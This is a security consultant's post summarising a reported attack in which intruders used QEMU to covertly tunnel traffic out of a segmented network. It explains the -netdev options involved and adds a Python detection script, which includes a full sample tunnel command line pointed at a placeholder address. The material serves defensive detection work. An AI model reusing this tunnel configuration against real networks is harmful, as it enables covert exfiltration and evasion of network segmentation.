Hackers abuse QEMU to covertly tunnel network traffic in cyberattacks.
IMRAN RASHEED
Cyber Security Consultant | Auditor | Risk Assessment | SOC | VAPT| C-CISO | CISSP |
As part of the attack, threat actors used QEMU to create virtual network interfaces and a socket-type network device to connect to a remote server.
QEMU offers unique capabilities such as emulating a wide range of hardware and virtual networks, allowing malicious activities to blend in with benign virtualisation traffic, and bridging segmented network parts through strategically set up VM pivot points.
In the attack seen by Kaspersky, the hackers utilised 'Angry IP Scanner' for network scanning, 'mimikatz' for credential theft, and QEMU for creating a sophisticated network tunnelling setup that facilitated a covert communication channel.
-netdev user,id=lan,restrict=off: configures a user-mode (SLIRP) network backend named 'lan' that reaches the network through the host's own stack; restrict=off leaves that access unrestricted.
-netdev hubport,id=port-lan,hubid=0,netdev=lan (and a second hubport with netdev=sock): attaches the 'lan' backend and the socket-type backend 'sock' to the same virtual hub (hubid=0), so traffic arriving on the socket connection is bridged onto the host-side network and vice versa.
Using QEMU, the attackers established a network tunnel from a targeted internal host that had no internet access to a pivot host that did; the pivot host in turn connected to the attacker's cloud server, which was running a Kali Linux VM.
The ability of QEMU VMs to link seamlessly and bridge segmented network components is critical in bypassing security measures and may also be used to further the breach laterally.
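From a detection standpoint, the tell-tale part of the setup described above is not QEMU itself but the -netdev layout: a socket backend and a host-facing backend joined through the same hub. The following is an added example (not code from Kaspersky, BleepingComputer or the QEMU project) that parses QEMU command lines as they would appear in process-creation telemetry and flags that layout. The sample command lines are constructed; the connect address is a documentation-range placeholder, and the -netdev option names used (user, socket, hubport, restrict, hubid, netdev) are standard QEMU syntax.

```python
"""Flag QEMU invocations whose -netdev layout bridges a host network backend
to a remote socket backend through a virtual hub (added example, not vendor code)."""
import shlex
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample process command lines, as a process-creation log might record them.
SAMPLES = {
    "suspicious": (
        "qemu-system-i386.exe -netdev user,id=lan,restrict=off "
        "-netdev socket,id=sock,connect=203.0.113.10:443 "   # placeholder address
        "-netdev hubport,id=port-lan,hubid=0,netdev=lan "
        "-netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic"
    ),
    "benign": (
        "qemu-system-x86_64 -m 2048 -hda disk.qcow2 "
        "-netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0"
    ),
}


@dataclass
class Netdev:
    kind: str                      # backend type: user, socket, hubport, tap, ...
    opts: Dict[str, str] = field(default_factory=dict)


def parse_netdevs(cmdline: str) -> List[Netdev]:
    """Extract every -netdev argument from a QEMU command line into Netdev records."""
    argv = shlex.split(cmdline)
    devs: List[Netdev] = []
    for i, arg in enumerate(argv[:-1]):
        if arg != "-netdev":
            continue
        parts = argv[i + 1].split(",")
        opts: Dict[str, str] = {}
        for kv in parts[1:]:
            key, _, value = kv.partition("=")
            opts[key] = value
        devs.append(Netdev(parts[0], opts))
    return devs


def bridged_to_remote_socket(devs: List[Netdev]) -> bool:
    """True if a socket backend and a host-facing backend sit on the same hub."""
    by_id = {d.opts["id"]: d for d in devs if "id" in d.opts}
    hubs: Dict[str, set] = {}   # hubid -> kinds of backends attached via hubports
    for d in devs:
        if d.kind != "hubport":
            continue
        backend = by_id.get(d.opts.get("netdev", ""))
        if backend is not None:
            hubs.setdefault(d.opts.get("hubid", "0"), set()).add(backend.kind)
    host_facing = {"user", "tap", "bridge"}
    return any("socket" in kinds and kinds & host_facing for kinds in hubs.values())


def assess(cmdline: str) -> List[str]:
    """Return human-readable findings for a QEMU command line (empty list = nothing notable)."""
    devs = parse_netdevs(cmdline)
    findings = []
    for d in devs:
        if d.kind == "socket":
            findings.append(f"socket backend '{d.opts.get('id')}' -> {d.opts.get('connect') or d.opts.get('listen')}")
        if d.kind == "user" and d.opts.get("restrict") == "off":
            findings.append(f"user-mode backend '{d.opts.get('id')}' with restrict=off")
    if bridged_to_remote_socket(devs):
        findings.append("hub bridges a socket backend to a host-facing backend (tunnel pattern)")
    return findings


if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(name, "->", assess(line) or "no findings")
```

The hub-bridging check is the one worth alerting on by itself; a socket backend alone, or restrict=off alone (which is QEMU's default for user-mode networking), appears in plenty of legitimate lab setups. Pair the rule with context such as whether the host is expected to run hypervisors at all and whether the socket peer is an internal address.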